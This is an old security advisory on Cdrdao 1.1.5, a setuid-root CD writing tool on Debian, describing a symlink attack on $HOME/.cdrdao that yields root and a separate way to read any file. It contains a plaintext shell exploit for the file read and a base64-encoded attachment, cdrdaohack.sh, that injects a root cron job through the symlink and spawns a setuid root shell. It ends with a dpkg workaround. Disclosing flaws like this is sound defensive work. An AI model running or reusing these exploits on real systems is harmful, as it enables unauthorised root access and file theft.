COMMAND Cdrdao local symlink attack leads to root access SYSTEMS AFFECTED Cdrdao 1.1.5 PROBLEM Jens \"atomi\" Steube found : There is a symlink vulnerability in the $HOME/.cdrao parsing of the program. Exploit : see shell script at the end of message ========= Update : Exploit 2, read files provided by Guillaume PELAT [http://www.intexxia.com] #!/bin/sh if [ \"$1\" ]; then cat > /tmp/t.c <<EOF #include <stdio.h> int main() { int i; while (fscanf(stdin, \"%i\", &i) > 0) { printf(\"%c%c\", (i & 0xff00) >> 8, i & 0xff); } return 0; } EOF cat > /tmp/t.toc <<EOF CD_ROM TRACK MODE1_RAW FILE \"$1\" 0 EOF gcc /tmp/t.c -o /tmp/show echo `cdrdao show-data -v 0 --force /tmp/t.toc 2>&1 | grep -v WARNING | = sed \'s/.*://g\' ` | /tmp/show rm -f /tmp/t.c /tmp/show /tmp/t.toc else echo \"Syntax: $0 filename\" fi --[ Description ]-- There are several security-related Bugs in the distributed Debian (SID) Package of CDRDAO, a program to write audio or mixed mode CD-Rs in disk-at-once mode. /usr/bin/cdrdao is setuid-Root by default. --[ Version ]-- Name: Cdrdao Version: 1.1.5 Autor: Andreas Mueller <andreas@daneb.de> --[ Impact ]-- Local users can gain unauthorized root access to the system. --[ Legal ]-- The information in this advisory may be distributed or reproduced, provided that the advisory is not modified in any way. The Autor makes no warranties of any kind to the information contained in this security advisory. --[ Bugs ]-- Cdrdao doesnt check for permissions when it trys to open a file as its \"toc-file\". So it was possible to open all Files on the System, but it skips the Output on its Error-Message. Maybe it is possible to trick to read all these Files. As i tested around to trick i found another Bug. This more important Bug is that cdrdao can also write a configfile which is written to \"$HOME/.cdrdao\". it is written by the Root-User and not as the User who starts cdrdao. It is possible to include data on the written configfile and so it is possible to gain root via a symlink-attack on $HOME/.cdrdao After i found these Bugs i stopped to search for more Bugs. --[ Fix ]-- Not tried to fix. The Autor, the Debian Package Maintainer and the Debian Bugtracking System (#127930) where informed one week before this Post, but there was no response. --[ Tested on ]-- Debian GNU/Linux SID on i386, installed gcc and running cron --[ Credits ]-- Found and exploited by Jens \"atomi\" Steube. Greets go out to: impulse, symbiont, mot, para, sharkking, kartan and all other friend on #altoetting and #perl.de on ircnet. --[ Proof of concept exploit ]-- The attached exploit is designed for the Debian (SID) Package and not tested on other Systems. Regards, Jens Steube jsteube@lastflood.com ---MOQ1010876960ed76bc7809e9920c116577c98a0ffdb0 Content-Type: application/octet-stream; name=; name=\"cdrdaohack.sh\" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename=\"cdrdaohack.sh\" IyEvYmluL2Jhc2gKCiMjIGNkcmRhb2hhY2suc2ggYnkgSmVucyAiYXRvbWkiIFN0ZXViZQoKUk9P VEVYRUNESVI9Ii9ldGMvY3Jvbi5kL2NkciIKQ0RSREFPPSIvdXNyL2Jpbi9jZHJkYW8iClVTRVJD T05GPSIkSE9NRS8uY2RyZGFvIgoKZWNobyAiVGVzdGluZyAkQ0RSREFPIgppZiBbICEgLXUgJENE UkRBTyBdOyB0aGVuCiAgZWNobyAiRVJST1I6ICRDRFJEQU8gaXMgbm90IHNldHVpZCBvciBkb2Vz IG5vdCBleGlzdCIKICBleGl0IDEKZmkKCmVjaG8gIkdlbmVyYXRpbmcgSGVscGVyIEZpbGVzIgoK Y2F0ID4gL3RtcC9kYW9zaC5jIDw8IEVPRgppbnQgbWFpbiAoKSB7IApzZXR1aWQoMCk7IHNldGdp ZCgwKTsKdW5saW5rKCIvdG1wL2Rhby5zaCIpOwp1bmxpbmsoIi90bXAvZGFvc2guYyIpOwp1bmxp bmsoIi9ldGMvY3Jvbi5kL2NkciIpOwp1bmxpbmsoIiRIT01FLy5jZHJkYW8iKTsKZXhlY2woIi9i aW4vYmFzaCIsImJhc2giLCItaSIsMCk7Cn0KRU9GCgpjYXQgPiAvdG1wL2Rhby5zaCA8PCBFT0YK Y2MgLW8gL3RtcC9kYW9zaCAvdG1wL2Rhb3NoLmMgPi9kZXYvbnVsbCAyPiYxCmNob3duIHJvb3Qg L3RtcC9kYW9zaCA+L2Rldi9udWxsIDI+JjEKY2hncnAgcm9vdCAvdG1wL2Rhb3NoID4vZGV2L251 bGwgMj4mMQpjaG1vZCA2NzU1IC90bXAvZGFvc2ggPi9kZXYvbnVsbCAyPiYxCmV4aXQgMApFT0YK CmNobW9kIDcwMCAvdG1wL2Rhby5zaAoKZWNobyAiQmFja2luZyB1cCBvcmlnaW5hbCAkVVNFUkNP TkYgZmlsZSB0byAkVVNFUkNPTkYub3JpZyIKbXYgJFVTRVJDT05GICRVU0VSQ09ORi5vcmlnID4v ZGV2L251bGwgMj4mMQoKZWNobyAiQ3JlYXRpbmcgU3ltbGluayBvbiAkVVNFUkNPTkYgdG8gJFJP T1RFWEVDRElSIgpsbiAtcyAkUk9PVEVYRUNESVIgJFVTRVJDT05GCgplY2hvICJFeGVjdXRpbmcg JENEUkRBTyIKCiRDRFJEQU8gd3JpdGUgLS1zYXZlIC0tZGV2aWNlICcKKiAqICogKiAqIHJvb3Qg L3RtcC9kYW8uc2ggPi9kZXYvbnVsbCAyPiYxCiMnIC0tYnVmZmVycyAnCicgLiA+L2Rldi9udWxs IDI+JjEKCmVjaG8gIldhaXRpbmcgZm9yIFJvb3RzaGVsbCwgd2FpdCBhdCBsZWFzdCAzIG1pbnV0 ZXMiCndoaWxlIFsgISAtdSAvdG1wL2Rhb3NoIF07IGRvCiAgZWNobyAtbiAiLiIKICBzbGVlcCAx CmRvbmUKCmVjaG8KZWNobyAiRW50ZXJpbmcgUm9vdHNoZWxsIGFuZCByZW1vdmluZyBIZWxwZXIg RmlsZXMiCmVjaG8gIkhhdmUgUGh1biA6LSkiCi90bXAvZGFvc2gKCg== ---MOQ1010876960ed76bc7809e9920c116577c98a0ffdb0-- SOLUTION A work around on debian is to: dpkg-statoverride --update --add root root 0755 /usr/bin/cdrdao This tells dpkg that cdrdao is not to be suid root anymore, at least until you change or delete that override.